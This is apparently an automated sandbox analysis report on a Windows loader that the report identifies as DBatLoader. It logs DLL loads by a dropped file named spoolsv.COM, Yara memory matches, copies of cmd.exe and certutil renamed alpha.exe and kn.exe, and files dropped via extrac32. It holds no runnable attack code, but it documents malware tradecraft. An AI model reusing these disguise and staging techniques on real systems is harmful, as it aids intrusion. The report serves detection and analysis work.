Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\Public\Libraries\spoolsv.COM

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Drops PE files with a suspicious file extension

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Svcrhpjadgyclc.cmd

Static file information: File size 2966423 > 1048576

Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1708863932.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1711616236.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1718686245.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1712244860.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1730523659.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1719493862.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1732423952.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1734954825.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1736215812.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1737154989.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1712966153.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1717235045.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1720044377.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1728999472.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1708863932.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1711616236.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1718686245.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1712244860.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1730523659.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1719493862.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1732423952.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1734954825.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1736215812.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1737154989.00007FF6BF402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1712966153.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1717235045.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1720044377.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1728999472.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 9.2.spoolsv.COM.2950000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1735073936.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2463920192.00000000021B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2480657895.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Source: C:\Users\Public\Libraries\spoolsv.COM

Code function: 9_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary,

9_2_029687A0

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.4.dr	Static PE information: section name: .didat

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7093668 push rsp; ret	6_2_00007FF7F7093669
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_029532FC push eax; ret	9_2_02953338
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0297C2FC push 0297C367h; ret	9_2_0297C35F
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295635C push 029563B7h; ret	9_2_029563AF
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295635A push 029563B7h; ret	9_2_029563AF
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0297C0AC push 0297C125h; ret	9_2_0297C11D
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0297C1F8 push 0297C288h; ret	9_2_0297C280
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0297C144 push 0297C1ECh; ret	9_2_0297C1E4
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_029686C0 push 02968702h; ret	9_2_029686FA
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295673E push 02956782h; ret	9_2_0295677A
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02956740 push 02956782h; ret	9_2_0295677A
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295C4F4 push ecx; mov dword ptr [esp], edx	9_2_0295C4F9
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0296E5B4 push ecx; mov dword ptr [esp], edx	9_2_0296E5B9
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295D528 push 0295D554h; ret	9_2_0295D54C
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295CB74 push 0295CCFAh; ret	9_2_0295CCF2
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0297BB6C push 0297BD94h; ret	9_2_0297BD8C
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02967894 push 02967911h; ret	9_2_02967909
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_029668D0 push 0296697Bh; ret	9_2_02966973
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_029668CE push 0296697Bh; ret	9_2_02966973
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02968916 push 02968950h; ret	9_2_02968948
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02968918 push 02968950h; ret	9_2_02968948
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0296A920 push 0296A958h; ret	9_2_0296A950
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_0295C976 push 0295CCFAh; ret	9_2_0295CCF2
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02962EE8 push 02962F5Eh; ret	9_2_02962F56
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02965E04 push ecx; mov dword ptr [esp], edx	9_2_02965E06
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02962FF4 push 02963041h; ret	9_2_02963039
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_02962FF3 push 02963041h; ret	9_2_02963039

Persistence and Installation Behavior

Source: C:\Users\Public\kn.exe

File created: C:\Users\Public\Libraries\spoolsv.COM

Jump to dropped file

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\spoolsv.COM	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

